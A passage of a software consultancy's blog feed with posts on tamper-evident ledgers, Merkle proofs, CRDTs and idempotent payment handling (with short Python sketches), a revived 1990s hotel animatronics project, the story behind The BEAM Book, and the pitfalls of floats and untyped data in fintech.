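    prev = '0' * 64
    for entry in ledger:
        if entry['hash'] != entry_hash(prev, entry['record']):
            return False
        prev = entry['hash']
    return True

ledger = []
append(ledger, {'debit': 'acct_a', 'credit': 'acct_b', 'cents': 10000})
append(ledger, {'debit': 'acct_b', 'credit': 'acct_c', 'cents': 2500})
assert verify(ledger)

ledger[0]['record']['cents'] = 1  # tamper with history
assert not verify(ledger)
```

&lt;p&gt;A production ledger would hash a canonical binary encoding and publish the head hash to an external party, so that even truncating the tail of the chain is detectable.&lt;/p&gt;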
&lt;p&gt;The result is a tamper-evident accounting system suitable for flows that
span organizations and regulators.
This is why your bank transfer shows as &amp;quot;pending&amp;quot; for a day or two: it sits
in a settlement ledger until the window closes and reconciliation
completes.&lt;/p&gt;
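&lt;p&gt;The inclusion proofs mentioned above can be sketched with a plain binary Merkle tree (the Patricia variant adds keyed paths and compression, omitted here for brevity). The verifier needs only the leaf, a handful of sibling hashes, and the trusted root:&lt;/p&gt;

```python
import hashlib

def h(data):
    return hashlib.sha256(data.encode()).hexdigest()

def build_levels(leaves):
    # Bottom-up levels; duplicate the last node on odd-sized levels.
    levels = [[h(x) for x in leaves]]
    while len(levels[-1]) > 1:
        cur = levels[-1]
        if len(cur) % 2:
            cur = cur + [cur[-1]]
        levels.append([h(cur[i] + cur[i + 1]) for i in range(0, len(cur), 2)])
    return levels

def proof(levels, index):
    # Sibling hash plus its side ('L' or 'R') at every level below the root.
    path = []
    for level in levels[:-1]:
        if len(level) % 2:
            level = level + [level[-1]]
        sib = index ^ 1
        side = 'L' if sib % 2 == 0 else 'R'
        path.append((level[sib], side))
        index //= 2
    return path

def verify(leaf, path, root):
    acc = h(leaf)
    for sib, side in path:
        acc = h(sib + acc) if side == 'L' else h(acc + sib)
    return acc == root

txs = ['tx1', 'tx2', 'tx3', 'tx4']
levels = build_levels(txs)
root = levels[-1][0]
assert verify('tx3', proof(levels, 2), root)
assert not verify('bogus', proof(levels, 2), root)
```

&lt;p&gt;The proof is logarithmic in the ledger size: a counterparty can check one transfer against a published root without ever seeing the other transactions.&lt;/p&gt;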
&lt;h3 id=&quot;crdts&quot; tabindex=&quot;-1&quot;&gt;CRDTs&lt;/h3&gt;
&lt;p&gt;Conflict-free replicated data types (CRDTs) allow distributed nodes to
update independently and converge without locks.&lt;/p&gt;
&lt;p&gt;In payments, this matters when multiple actors must see consistent balances
without a single global database.
Imagine a mobile wallet replicated across regions: users can initiate
payments offline or under flaky networks.
Each node accepts local updates, and CRDTs guarantee the balances converge
once connectivity is restored.&lt;/p&gt;
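&lt;p&gt;A PN-counter, one of the simplest CRDTs, is enough to show the convergence property. This is a toy two-replica balance, not a production wallet design: each replica keeps per-replica totals of credits and debits, and merge takes element-wise maxima, so replicas agree regardless of merge order.&lt;/p&gt;

```python
class PNCounter:
    # State-based PN-counter: per-replica grow-only credit/debit maps.
    def __init__(self):
        self.incs = {}
        self.decs = {}

    def credit(self, replica, cents):
        self.incs[replica] = self.incs.get(replica, 0) + cents

    def debit(self, replica, cents):
        self.decs[replica] = self.decs.get(replica, 0) + cents

    def value(self):
        return sum(self.incs.values()) - sum(self.decs.values())

    def merge(self, other):
        # Element-wise max makes merge commutative, associative, idempotent.
        for mine, theirs in ((self.incs, other.incs), (self.decs, other.decs)):
            for k, v in theirs.items():
                mine[k] = max(mine.get(k, 0), v)

# Two replicas accept updates independently (e.g. while offline).
eu, us = PNCounter(), PNCounter()
eu.credit('eu', 10000)
us.debit('us', 2500)

eu.merge(us)
us.merge(eu)
assert eu.value() == us.value() == 7500
```

&lt;p&gt;Note what the CRDT does and does not give you: the balances converge, but nothing here stops a balance from going negative while replicas are partitioned. That invariant needs a reservation or escrow scheme on top.&lt;/p&gt;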
&lt;p&gt;Chris Meiklejohn and colleagues have shown how CRDTs can underpin highly
available systems that still provide strong convergence guarantees.
Systems like &lt;a href=&quot;https://www.filibuster.cloud/&quot;&gt;Filibuster&lt;/a&gt; push this further
by systematically testing failure scenarios in microservices,
ensuring that retries and idempotency hold even under complex distributed
failures.&lt;/p&gt;
&lt;p&gt;Academic work such as &lt;a href=&quot;https://dl.acm.org/doi/10.1145/2790449.2790525&quot;&gt;Meiklejohn &amp;amp; Van Roy&#39;s
&amp;quot;Lasp&amp;quot;&lt;/a&gt; and later work on
&lt;a href=&quot;https://dl.acm.org/doi/10.1145/3408976&quot;&gt;replicated data types at scale&lt;/a&gt;
point to a future where distributed programming models incorporate these
guarantees by design, rather than bolting them on afterwards.&lt;/p&gt;
&lt;p&gt;These approaches do not remove complexity, but they make convergence
predictable.
They are the natural extension of the same instinct that made relational
databases so powerful in the 70s:
encapsulate the hard problems once, so that application developers can move
faster with less risk.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;practical-guidance&quot; tabindex=&quot;-1&quot;&gt;Practical Guidance&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;If one service and one database can own the whole transaction, trust it.&lt;/li&gt;
&lt;li&gt;If multiple services are involved, add tokens, idempotency, and durable queues.&lt;/li&gt;
&lt;li&gt;If multiple organizations or regions are involved, add ledgers and consider CRDTs.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is not academic. It&#39;s how real-world systems run.
Stripe processes millions of payments a day using idempotency keys.
Your bank marks a transfer as &amp;quot;pending&amp;quot; because it sits in a settlement ledger until the next batch window.
The point is not to eliminate retries or duplicates, but to make them safe and boring.&lt;/p&gt;
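&lt;p&gt;The token-and-idempotency guidance fits in a few lines. An in-memory dict stands in for a durable store, and the names are illustrative: the handler keys each result by the client-supplied idempotency key, so a retried delivery replays the stored outcome instead of charging twice.&lt;/p&gt;

```python
processed = {}  # idempotency_key to result; durable storage in real systems

def charge(key, cents):
    if key in processed:
        return processed[key]  # duplicate delivery: replay the stored result
    result = {'status': 'charged', 'cents': cents}  # side effect happens once
    processed[key] = result
    return result

first = charge('key-123', 9900)
retry = charge('key-123', 9900)  # at-least-once delivery retries
assert retry is first  # same outcome, no double charge
```

&lt;p&gt;The store lookup and the side effect must commit atomically (or the key must be written first and reconciled on crash); that is the part the in-memory sketch glosses over.&lt;/p&gt;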
</content>
  </entry>
  
  <entry>
    <title>Assembler, Stepper Motors, and a Hotel Pool</title>
    <link href="https://happihacking.com/blog/posts/2025/statt_background/"/>
    <updated>2025-08-18T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/statt_background/</id>
    <summary>Revisiting the animatronic spy drama of Haparanda Stadshotell, three decades later</summary>
    <content type="html">&lt;h1 id=&quot;the-spy-dolls-under-the-dance-floor&quot; tabindex=&quot;-1&quot;&gt;The Spy Dolls Under the Dance Floor&lt;/h1&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/kgb_doll.jpg&quot; alt=&quot;A dirty, dusty scene
with an old spy doll and a tray.&quot; title=&quot;A dirty, dusty scene
with an old spy doll and a tray.&quot; /&gt; “A dirty spy.”&lt;/p&gt;
&lt;p&gt;In the early 90s, before I got my Computer Science education, I had already
been programming for over a decade. My path didn’t begin in academia. It
started with a Texas Instruments calculator, then a VIC-20, a Commodore 64,
and later an ABC-80 and 800. By the time I bought my first PC, I was deep
into BASIC, 6502 assembler, with the occasional detour into Pascal. Most of
what I knew came from &lt;em&gt;Doctor Dobb’s Journal&lt;/em&gt;, &lt;em&gt;BYTE&lt;/em&gt;, POC magazine, and a
small stack of programming books, like Peter Norton’s Programmer’s Guide to
the IBM PC, that felt like treasures.&lt;/p&gt;
&lt;p&gt;By 1989 I had even started my own consulting company, mostly as a way to
write off expensive hardware. That company gave me assignments like a
consolidated account statement program for Norrfryskoncernen. Through them
I also got to know Haparanda Stadshotell, known simply as “Statt”, a place
full of history and, for me, many memories.&lt;/p&gt;
&lt;p&gt;One of those memories is now coming back to life.&lt;/p&gt;
&lt;h3 id=&quot;the-animatronics-project&quot; tabindex=&quot;-1&quot;&gt;The Animatronics Project&lt;/h3&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/nils_by_ulf.jpg&quot; alt=&quot;A caricature of my
father drawn by Ulf R Hansson.&quot; title=&quot;A caricature of my
father drawn by Ulf R Hansson.&quot; /&gt; “A caricature of my father, drawn by
Ulf R. Hansson, the artist I collaborated with on the Stadshotellet
animatronics project.”&lt;/p&gt;
&lt;p&gt;Around 1991–92, I worked with the artist and teacher Ulf R. Hansson to
build an unusual installation in Stadshotellet’s old indoor pool (which
later became the dance floor under a glass roof). We called it the spy
scene of KGB 1917. KGB was the new name for the bistro annex to the
hotel: &amp;quot;Kaffé Gulach Baronen&amp;quot;.&lt;/p&gt;
&lt;p&gt;It was part animatronics, part theatre, part Cold War curiosity. Handmade
dolls and a tray moved by stepper motors, synchronized to a cassette tape
soundtrack. Everything was controlled by a 286 PC running pure assembler
that I had written. No frameworks. No abstractions. Just hardware hacking
and bare-metal code.&lt;/p&gt;
&lt;p&gt;For a while, it ran regularly. Guests at Statt could look down through the
glass floor and see the little spy drama unfold. And then, like many side
projects of its time, it fell silent.&lt;/p&gt;
&lt;p&gt;Some say it was lightning; some say the dancers scratched the glass
floor so badly that you couldn&#39;t see anything through it anymore.&lt;/p&gt;
&lt;h3 id=&quot;thirty-years-later&quot; tabindex=&quot;-1&quot;&gt;Thirty Years Later&lt;/h3&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/the_kgb_setup.jpg&quot; alt=&quot;Me standing in
the cellar with the old setup.&quot; title=&quot;Me standing in
the cellar with the old setup.&quot; /&gt; “Everything still there, covered in
dust.”&lt;/p&gt;
&lt;p&gt;The system has been dormant for more than three decades. The dolls, tray,
motors, and cassette player just sat in the cellar where they were left,
while the hotel reinvented itself around them. But now, as Stadshotellet
approaches its 125-year celebration, the owners want the show to return.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/the_kgb_controller.jpg&quot; alt=&quot;Some
hardware hacks controlling stepping motors.&quot; title=&quot;Some
hardware hacks controlling stepping motors.&quot; /&gt; “Was I a hardware hacker?”&lt;/p&gt;
&lt;p&gt;That’s where I come in again. The task: bring the spy dolls back to life.
Preserve their nostalgic charm, but give them a new, reliable control
system that can run daily for modern audiences.&lt;/p&gt;
&lt;p&gt;It feels like a bridge between eras. In 1992, I was a self-taught
programmer from Haparanda, living on magazines and sheer curiosity, hacking
assembler late into the night. Today, I design scalable systems for fintech
and regulated industries, built to survive Friday deploys and Monday
audits. And somehow, the old spy scene connects the two.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/kgb_listing.jpg&quot; alt=&quot;A dir command:
KGB19717.ASM 26185 93-06-11.&quot; title=&quot;A dir command:
KGB19717.ASM 26185 93-06-11.&quot; /&gt; “26kB assembler code.”&lt;/p&gt;
&lt;h3 id=&quot;next&quot; tabindex=&quot;-1&quot;&gt;Next&lt;/h3&gt;
&lt;p&gt;Over the coming months, I plan to share the journey of reviving this
project. From site inspections and dusty cassette tapes to Raspberry Pis,
YAML choreography, and motor drivers. It’s part archaeology, part
engineering, and part nostalgia.&lt;/p&gt;
&lt;p&gt;For me, it’s also a reminder of where this all began.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/kgb_assembler.jpg&quot; alt=&quot;A listing of
assembler code.&quot; title=&quot;A listing of
assembler code.&quot; /&gt; “Surprisingly well documented, in Swedish.”&lt;/p&gt;
&lt;p&gt;Next, I need to figure out how to extract 26 KB of assembler code from a PC
with only a floppy drive and no network. The dolls may still be intact, but
the real archaeology starts with the bits.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Why I Wrote the BEAM Book</title>
    <link href="https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/"/>
    <updated>2025-06-03T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/</id>
    <summary>Post-mortems, coffee, and a decade of stubborn curiosity</summary>
    <content type="html">&lt;h2 id=&quot;why-i-wrote-the-beam-book&quot; tabindex=&quot;-1&quot;&gt;Why I wrote the Beam Book&lt;/h2&gt;
&lt;p&gt;After ten years of keeping Klarna’s core system upright I know this: a 15
millisecond pause in the BEAM can stall millions of peak-shopping payments, trigger a 3 a.m. Christmas-Eve post-mortem, and earn you a very awake call from the CEO. I wrote &lt;em&gt;The BEAM Book&lt;/em&gt; so the next engineer fixes that pause before the coffee cools.&lt;/p&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/thebeambooks.jpg&quot; alt=&quot;A picture of two printed BEAM Books.&quot; title=&quot;A picture of two printed BEAM Books.&quot; /&gt;
&lt;h3 id=&quot;origins&quot; tabindex=&quot;-1&quot;&gt;Origins&lt;/h3&gt;
&lt;p&gt;I opened the project on 12 October 2012 with a lone DocBook file containing four lines of text and an oversized sense of optimism.
After two weeks, the commit log is mostly me adding structure, moving
headings, and updating metadata. Most of it is scaffolding. The actual
content is still just a few hopeful lines.&lt;/p&gt;
&lt;p&gt;By November I had abandoned DocBook for AsciiDoc, written a custom build
script, and convinced myself the book could be wrapped up in six months.
Those early commits glow with energy: adds, rewrites, then more
rewrites to fix the rewrites.
Delusion is underrated.&lt;/p&gt;
&lt;p&gt;In 2013 I managed to convince O’Reilly to publish. Moving the repo to their
Atlas system sounded simple until Atlas began hiding my main file and
overwriting half-finished chapters.&lt;/p&gt;
&lt;p&gt;The Git history reads like a diary of frustration:
“Moving files to top level to cope with Atlas,” “Atlas seems to be
overwriting book.asciidoc”. Word count shot past 120 000 while actual
progress crawled. On 10 March 2015 I was literally “Smashing chapters into sections” just to keep the build green.&lt;/p&gt;
&lt;p&gt;The quiet cancellation came two months later. No drama, just a polite call and a line through the contract. Relief mingled with embarrassment: I had spent two years rearranging files rather than finishing sentences.&lt;/p&gt;
&lt;p&gt;Pragmatic Bookshelf took over that same year. I kept working in CVS for
their production system, but progress was slow. Eventually, they cancelled
too. On 20 January 2017, I imported everything into a new repo in one
massive commit: 6,622 files, over a million lines.
The rewrite stalled, and so did the project.&lt;/p&gt;
&lt;p&gt;On 23 March 2017 I started fresh with Asciidoctor in a private GitHub repo, copy-pasting
only the parts that still made sense. Two weeks later, on April 7, minutes before
a lecture at Chalmers, I flipped the repository public. Within twenty-four
hours strangers fixed typos, added diagrams, and merged a Creative Commons
BY-4.0 license.&lt;/p&gt;
&lt;h3 id=&quot;what-kept-me-going&quot; tabindex=&quot;-1&quot;&gt;What Kept Me Going&lt;/h3&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://api.star-history.com/svg?repos=happi/theBeamBook&amp;type=Date&quot; alt=&quot;A picture of the stars on GitHub passing 3000.&quot; title=&quot;A picture of the stars on GitHub passing 3000.&quot; /&gt;
&lt;p&gt;I kept going because I wanted to understand the BEAM properly. There’s
value in following the real logic, not just the surface explanations.&lt;/p&gt;
&lt;p&gt;Community feedback made a difference. As soon as the repo was public,
people began sending corrections, examples, and improvements.&lt;/p&gt;
&lt;p&gt;Seeing the numbers of people starring the repo on GitHub kept me going.
One highlight: &lt;strong&gt;Issue #113 - &amp;quot;Please continue being awesome.&amp;quot;&lt;/strong&gt;
(I wrote &lt;a href=&quot;https://happihacking.com/blog/posts/2025/an_issue/&quot;&gt;a whole post about that issue&lt;/a&gt;.)
That emoji-laced drive-by encouragement (August 2018) still pops into my
head whenever motivation dips.&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/issue113.png&quot; alt=&quot;Issue 113: This book
is ridiculously good. I have only read a few bits of it so far and have
learned a lot already. Please continue being awesome!&quot; title=&quot;Issue 113: This book
is ridiculously good. I have only read a few bits of it so far and have
learned a lot already. Please continue being awesome!&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The book started showing up as a reference in Erlang and BEAM conference
talks, sometimes several times in the same event. That was a clear signal
that others needed this as much as I did.&lt;/p&gt;
&lt;p&gt;Even Twitter (in the good old days of Twitter) played a role. Whenever
someone mentioned the book or shared a
link, it was an extra nudge to keep at it.&lt;/p&gt;
&lt;p&gt;Mostly, I just wanted a manual I could trust myself, a reference for the
parts of the VM that matter when things go wrong. That’s reason enough to
keep writing, even after the third rewrite.&lt;/p&gt;
&lt;h3 id=&quot;whats-inside-the-book-who-it-helps&quot; tabindex=&quot;-1&quot;&gt;What’s Inside the Book &amp;amp; Who It Helps&lt;/h3&gt;
&lt;p&gt;The book covers what I wish I’d had when building and operating large
Erlang systems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Schedulers and process management: How the BEAM schedules,
prioritizes, and balances processes under real load.&lt;/li&gt;
&lt;li&gt;Processes and their memory: How process heaps,
stack, messages, and binaries are managed and
why these details matter in production.&lt;/li&gt;
&lt;li&gt;Garbage collection and memory: What actually happens
with per-process and global garbage collectors, binary references,
and memory leaks.&lt;/li&gt;
&lt;li&gt;Tagging schemes and terms: How the BEAM represents data (integers,
floats, tuples, binaries, references) down to the tagging bits.&lt;/li&gt;
&lt;li&gt;The compiler and the VM: How code is turned into instructions,
what the compiler does (and doesn’t do), and how the emulator executes it.&lt;/li&gt;
&lt;li&gt;Tracing and debugging: Practical use of dbg, erlang:trace,
and other tools to follow messages, events, and identify bottlenecks.&lt;/li&gt;
&lt;li&gt;Performance tuning: What matters when profiling real code,
understanding reductions, and tracking down real-world latency problems.&lt;/li&gt;
&lt;li&gt;System architecture: How ERTS, the BEAM VM, and their subsystems
actually work together in a running node.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you build or operate Erlang or Elixir systems, especially under any kind
of scale, this book is for you. It saves you from hunting through mailing
lists, scattered docs, and code comments just to answer, “Why is the VM
behaving like this?”&lt;/p&gt;
&lt;h3 id=&quot;lessons-learned&quot; tabindex=&quot;-1&quot;&gt;Lessons Learned&lt;/h3&gt;
&lt;p&gt;Persistence beats perfection. Two cancelled publishing deals look bad on a
résumé, but an unfinished idea looks worse.&lt;/p&gt;
&lt;p&gt;Boundaries matter. I made progress by blocking time for writing, turning
off notifications, and treating focus like a real deadline. Fika at 14:30
is non-negotiable.&lt;/p&gt;
&lt;p&gt;The crowd helps. Making the repo public brought in corrections,
encouragement, and the occasional nudge when motivation was low.&lt;/p&gt;
&lt;p&gt;Scope is everything. I cut the details on dirty schedulers, the new JIT,
and the debugger. Maybe those will end up in an appendix, but not in the
core. I wrote more about this scoping process in &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the_beam_book_lessons/&quot;&gt;The BEAM Book Is Almost Done&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Ship, then iterate. The BEAM changes every year. A living Git repo keeps
up.&lt;/p&gt;
&lt;p&gt;A real deadline helps. This January, during my yearly review, I
decided to print the book in time for Code Beam Stockholm. I thought I had
until autumn; it turned out the conference was June 2. That’s how you find out
what’s truly essential.&lt;/p&gt;
&lt;h3 id=&quot;definition-of-done&quot; tabindex=&quot;-1&quot;&gt;Definition of Done&lt;/h3&gt;
&lt;p&gt;Holding the print in my hands, it finally feels finished, at least for now. Years of scattered commits are bound into something real, so I’m calling it done.&lt;/p&gt;
&lt;h3 id=&quot;get-involved&quot; tabindex=&quot;-1&quot;&gt;Get Involved&lt;/h3&gt;
&lt;p&gt;You can now get the paperback: The BEAM Book 1.0 is live on
&lt;a href=&quot;https://www.amazon.com/dp/9153142535&quot;&gt;Amazon&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you spot an error, want to improve something, or just want to see how it
works under the hood, star or fork the repo. File an issue or, even better,
submit a pull request. Contributors are credited in the acknowledgments.
&lt;a href=&quot;https://github.com/happi/theBeamBook&quot;&gt;GitHub: theBeamBook&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;If you read the book, please leave an honest review.
Algorithms notice real feedback more than marketing copy.&lt;/p&gt;
&lt;p&gt;If your team wants a deep dive, I run hands-on BEAM internals
workshops, tailored for real systems, not just hello world.
Email me if that’s what you need.
&lt;a href=&quot;mailto:happi@happihacking.com&quot;&gt;happi@happihacking.com&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Your Finance Stack Is Lying to You</title>
    <link href="https://happihacking.com/blog/posts/2025/fintech_complexity/"/>
    <updated>2025-05-22T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/fintech_complexity/</id>
    <summary>Accidental Complexity in Fintech</summary>
    <content type="html">&lt;h1 id=&quot;your-finance-stack-is-lying-to-you&quot; tabindex=&quot;-1&quot;&gt;Your Finance Stack Is Lying to You&lt;/h1&gt;
&lt;p&gt;Why Untyped Data, Floats, and “Excel Thinking” Are Quietly Costing You Millions&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/simplicity.jpg&quot; alt=&quot;A picture of the plumbing for my heating system with the caption: Simplicity - It&#39;s for simpletons.&quot; title=&quot;A picture of the plumbing for my heating system with the caption: Simplicity - It&#39;s for simpletons.&quot; /&gt;&lt;/p&gt;
&lt;p&gt;At a recent fintech conference, I was struck by how much engineering effort, across both startups and enterprises, is spent cleaning up avoidable messes. Not building competitive advantages. Just damage control:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Rounding errors in reports&lt;/li&gt;
&lt;li&gt;Mismatched payment records&lt;/li&gt;
&lt;li&gt;Inconsistent handling of currency and tax&lt;/li&gt;
&lt;li&gt;Broken reconciliation across systems&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Entire teams, and even companies, exist just to fix these issues. The root cause?&lt;/p&gt;
&lt;p&gt;Untyped, context-free data.&lt;/p&gt;
&lt;h2 id=&quot;the-excel-legacy-that-wont-die&quot; tabindex=&quot;-1&quot;&gt;The Excel Legacy That Won’t Die&lt;/h2&gt;
&lt;p&gt;Most financial systems still think like spreadsheets. In Excel, 100 can mean anything: euros, dollars, cents, basis points. There’s no schema. No units. No context.&lt;/p&gt;
&lt;p&gt;That thinking leaks into production systems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;APIs with vague fields like amount, value, or fee&lt;/li&gt;
&lt;li&gt;float(8) columns for monetary values&lt;/li&gt;
&lt;li&gt;Boolean values stored as &amp;quot;yes&amp;quot;/&amp;quot;no&amp;quot;&lt;/li&gt;
&lt;li&gt;Timestamps with no timezone&lt;/li&gt;
&lt;li&gt;Magic numbers passed around without meaning&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It might be fast to prototype. But it creates long-term ambiguity, and ambiguity compounds into bugs, delays, and failures.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Essential vs Accidental Complexity&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Essential complexity&lt;/strong&gt; is built into the (financial) domain itself, like multiple
currencies, tax rules, compliance steps.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Accidental complexity&lt;/strong&gt; is everything we add on top: floats for money,
ambiguous JSON fields, brittle one-off scripts.
This article shows how accidental complexity quietly overwhelms the essential.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;its-worse-in-big-companies&quot; tabindex=&quot;-1&quot;&gt;It’s Worse in Big Companies&lt;/h2&gt;
&lt;p&gt;This isn’t just a startup problem.&lt;/p&gt;
&lt;p&gt;Large enterprises, such as banks, insurance firms, payment providers, layer complex architectures on top of the same assumptions.&lt;/p&gt;
&lt;p&gt;To deal with the resulting chaos, they adopt:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ESBs (Enterprise Service Buses) to transform one vague schema into another&lt;/li&gt;
&lt;li&gt;iPaaS (Integration Platform as a Service) tools to sync inconsistent fields across internal platforms&lt;/li&gt;
&lt;li&gt;Custom middleware and manual workarounds just to keep systems aligned&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The irony? Many of these systems exist solely to translate &amp;quot;value&amp;quot;: 100 into another format of &amp;quot;value&amp;quot;: 100.&lt;/p&gt;
&lt;p&gt;It’s not domain complexity. It’s accidental complexity, caused by a lack of enforced structure.&lt;/p&gt;
&lt;h2 id=&quot;b2b-invoicing-is-still-email-and-pdfs&quot; tabindex=&quot;-1&quot;&gt;B2B Invoicing Is Still Email and PDFs&lt;/h2&gt;
&lt;p&gt;If you think we’ve moved past this, look at B2B invoicing.&lt;/p&gt;
&lt;p&gt;In 2025, most companies still send and receive invoices via PDFs attached to emails.&lt;/p&gt;
&lt;p&gt;Some are exported from ERPs. Others are typed manually in Word. On the receiving end:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Amounts are extracted with OCR or regex&lt;/li&gt;
&lt;li&gt;PO numbers are verified manually&lt;/li&gt;
&lt;li&gt;Payment terms and VAT rates are interpreted via email follow-ups&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Even with e-invoicing formats like Peppol or Factur-X available, adoption is partial and enforcement is weak. Most systems fall back to parsing visual representations of meaning, not actual structured data.&lt;/p&gt;
&lt;p&gt;This leads to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Duplicate or late payments&lt;/li&gt;
&lt;li&gt;Misrouted funds&lt;/li&gt;
&lt;li&gt;Fraud via spoofed invoices&lt;/li&gt;
&lt;li&gt;Manual reconciliation loops that delay accounting closes&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We’re throwing machine learning and automation at a problem that starts with: Why are we still emailing pictures of invoices?&lt;/p&gt;
&lt;h2 id=&quot;floats-the-silent-saboteurs&quot; tabindex=&quot;-1&quot;&gt;Floats, the Silent Saboteurs&lt;/h2&gt;
&lt;p&gt;A particularly nasty example: using floats for money.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0.1 + 0.2 != 0.3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It’s the reason your payment gateway and your ledger might silently disagree.&lt;/p&gt;
&lt;p&gt;Using floating-point types for financial calculations leads to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Rounding errors&lt;/li&gt;
&lt;li&gt;Reconciliation drift&lt;/li&gt;
&lt;li&gt;Bugs that only surface under load, scale, or edge cases&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Use integers for minor units (e.g. cents) or proper decimal types. Never float.&lt;/p&gt;
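&lt;p&gt;The drift is easy to demonstrate. The behaviour below is IEEE 754 floating point, so it is the same in every mainstream language, not a Python quirk:&lt;/p&gt;

```python
from decimal import Decimal

# Ten payments of 0.10 in binary floats miss the expected total.
total_float = sum([0.10] * 10)
assert total_float != 1.0  # accumulates to 0.9999999999999999

# Integers in minor units (cents) are exact.
total_cents = sum([10] * 10)
assert total_cents == 100

# So are proper decimal types.
total_decimal = sum([Decimal('0.10')] * 10, Decimal('0'))
assert total_decimal == Decimal('1.00')
```

&lt;p&gt;One misplaced float in a pipeline is enough; the error is invisible per transaction and only shows up as reconciliation drift at volume.&lt;/p&gt;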
&lt;h2 id=&quot;llms-are-not-helping&quot; tabindex=&quot;-1&quot;&gt;LLMs Are Not Helping&lt;/h2&gt;
&lt;p&gt;Large language models like ChatGPT can now write your APIs, schemas, and database models.&lt;/p&gt;
&lt;p&gt;But unless you’re careful, they’ll replicate the same bad patterns. Just faster:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;amount: number with no context&lt;/li&gt;
&lt;li&gt;float instead of decimal&lt;/li&gt;
&lt;li&gt;JSON blobs without units, validation, or structure&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;LLMs autocomplete based on frequency, not correctness.
Without strong engineering guardrails, you’re just mass-producing technical debt.&lt;/p&gt;
&lt;h2 id=&quot;databases-and-the-illusion-of-structure&quot; tabindex=&quot;-1&quot;&gt;Databases and the Illusion of Structure&lt;/h2&gt;
&lt;p&gt;Even when your application code is well-typed, your database schema often isn’t. Relational databases may enforce column types (float, int, varchar), but they rarely capture meaning.&lt;/p&gt;
&lt;p&gt;A column named amount might hold:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Gross or net values&lt;/li&gt;
&lt;li&gt;In different currencies&lt;/li&gt;
&lt;li&gt;As float or decimal&lt;/li&gt;
&lt;li&gt;With or without tax&lt;/li&gt;
&lt;li&gt;In cents or full units&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Unless you enforce units and context explicitly, via naming conventions, type systems, or documentation, your schema becomes a silent source of ambiguity.&lt;/p&gt;
&lt;p&gt;And in NoSQL databases like MongoDB, it gets worse.&lt;/p&gt;
&lt;p&gt;Mongo stores everything as JSON-like documents. There’s no enforced schema unless you layer one on top. So teams end up storing arbitrary fields like:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{ &amp;quot;value&amp;quot;: 99.99 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is value here? Dollars? Euros? A discount rate? A tax multiplier?
Your system won’t tell you. It just stores whatever someone wrote last week.&lt;/p&gt;
&lt;p&gt;And since Mongo supports flexible updates, it’s easy to gradually evolve documents into inconsistent messes. One document has &amp;quot;amount&amp;quot;: &amp;quot;100&amp;quot;, another has amount: 100.0, and a third has:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &amp;quot;amount&amp;quot;: { &amp;quot;value&amp;quot;:    10000,
              &amp;quot;currency&amp;quot;: &amp;quot;USD&amp;quot;,
              &amp;quot;unit&amp;quot;:    &amp;quot;cents&amp;quot; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now your query logic needs to branch, and bugs start to breed.&lt;/p&gt;
&lt;h2 id=&quot;json-ubiquitous-and-ambiguous&quot; tabindex=&quot;-1&quot;&gt;JSON: Ubiquitous and Ambiguous&lt;/h2&gt;
